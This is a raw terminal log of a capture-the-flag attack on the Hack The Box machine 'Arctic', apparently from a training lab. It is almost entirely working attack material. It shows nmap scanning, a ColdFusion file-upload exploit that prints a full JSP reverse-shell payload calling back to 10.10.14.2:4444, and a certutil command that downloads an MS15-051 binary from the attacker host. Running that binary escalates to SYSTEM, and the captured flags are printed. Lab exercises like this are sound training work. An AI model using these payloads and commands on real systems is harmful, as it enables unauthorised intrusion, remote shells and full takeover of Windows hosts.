root@ubuntu-s-1vcpu-1gb-sfo2-01:~/htb/htb# nmap -T4 -p- -v 10.10.10.11
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-28 14:26 UTC
Initiating Ping Scan at 14:26
Scanning 10.10.10.11 [4 ports]
Completed Ping Scan at 14:26, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:26
Completed Parallel DNS resolution of 1 host. at 14:26, 0.00s elapsed
Initiating SYN Stealth Scan at 14:26
Scanning 10.10.10.11 [65535 ports]
Discovered open port 135/tcp on 10.10.10.11
SYN Stealth Scan Timing: About 10.75% done; ETC: 14:31 (0:04:17 remaining)
SYN Stealth Scan Timing: About 34.64% done; ETC: 14:29 (0:01:55 remaining)
Discovered open port 8500/tcp on 10.10.10.11
Discovered open port 49154/tcp on 10.10.10.11
SYN Stealth Scan Timing: About 64.82% done; ETC: 14:28 (0:00:49 remaining)
Completed SYN Stealth Scan at 14:28, 124.21s elapsed (65535 total ports)
Nmap scan report for 10.10.10.11
Host is up (0.14s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 124.54 seconds
           Raw packets sent: 131156 (5.771MB) | Rcvd: 96 (4.352KB)

root@ubuntu-s-1vcpu-1gb-sfo2-01:~/htb/htb/Arctic_10.10.10.11# nikto -h 10.10.10.11:8500
- Nikto v2.1.6
---------------------------------------------------------------------------
+ No web server found on 10.10.10.11:8500
---------------------------------------------------------------------------
+ 0 host(s) tested

In 8500, found CFIDE

searchsploit -m 50057
root@ubuntu-s-1vcpu-1gb-sfo2-01:~/htb/htb/Arctic_10.10.10.11# python3 50057.py

Generating a payload...
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:29: warning: constant Gem::ConfigMap is deprecated
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:30: warning: constant Gem::ConfigMap is deprecated
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated
Ignoring nokogiri-1.8.2 because its extensions are not built. Try: gem pristine nokogiri --version 1.8.2
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated
Payload size: 1496 bytes
Saved as: 9da5f62cc281477dbc87922b84537e60.jsp

Priting request...
Content-type: multipart/form-data; boundary=6ee9a4a00dc343a7921c18ad7c7bd53b
Content-length: 1697

--6ee9a4a00dc343a7921c18ad7c7bd53b
Content-Disposition: form-data; name="newfile"; filename="9da5f62cc281477dbc87922b84537e60.txt"
Content-Type: text/plain

<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
  class StreamConnector extends Thread
  {
    InputStream v1;
    OutputStream re;

    StreamConnector( InputStream v1, OutputStream re )
    {
      this.v1 = v1;
      this.re = re;
    }

    public void run()
    {
      BufferedReader ye  = null;
      BufferedWriter iiz = null;
      try
      {
        ye  = new BufferedReader( new InputStreamReader( this.v1 ) );
        iiz = new BufferedWriter( new OutputStreamWriter( this.re ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = ye.read( buffer, 0, buffer.length ) ) > 0 )
        {
          iiz.write( buffer, 0, length );
          iiz.flush();
        }
      } catch( Exception e ){}
      try
      {
        if( ye != null )
          ye.close();
        if( iiz != null )
          iiz.close();
      } catch( Exception e ){}
    }
  }

  try
  {
    String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
  ShellPath = new String("/bin/sh");
} else {
  ShellPath = new String("cmd.exe");
}

    Socket socket = new Socket( "10.10.14.2", 4444 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>

--6ee9a4a00dc343a7921c18ad7c7bd53b--


Sending request and printing response...


                <script type="text/javascript">
                        window.parent.OnUploadCompleted( 0, "/userfiles/file/9da5f62cc281477dbc87922b84537e60.jsp/9da5f62cc281477dbc87922b84537e60.txt", "9da5f62cc281477dbc87922b84537e60.txt", "0" );
                </script>


Printing some information for debugging...
lhost: 10.10.14.2
lport: 4444
rhost: 10.10.10.11
rport: 8500
payload: 9da5f62cc281477dbc87922b84537e60.jsp

Deleting the payload...

Listening for connection...

Executing the payload...
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.10.10.11 49254 received!







Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tolis\Desktop>type user.txt
type user.txt
3d2e8d5efd239881b6cd8b76823ddfea
C:\Users\tolis\Desktop>systeminfo
systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45 ▒▒
System Boot Time:          30/5/2022, 1:17:40 ▒▒
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     6.143 MB
Available Physical Memory: 5.056 MB
Virtual Memory: Max Size:  12.285 MB
Virtual Memory: Available: 11.231 MB
Virtual Memory: In Use:    1.054 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

For 2008 R2, we can use MS15-051:

C:\Users\Public>certutil -urlcache -f http://10.10.14.2:8000/ms15-051x64.exe ms15-051x64.exe
certutil -urlcache -f http://10.10.14.2:8000/ms15-051x64.exe ms15-051x64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Users\Public>ms15-051x64.exe cmd.exe
ms15-051x64.exe cmd.exe
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 3528 created.
==============================
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Public>whoami
whoami
nt authority\system

C:\Users\Public>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
034840854422322de861ff0978357126

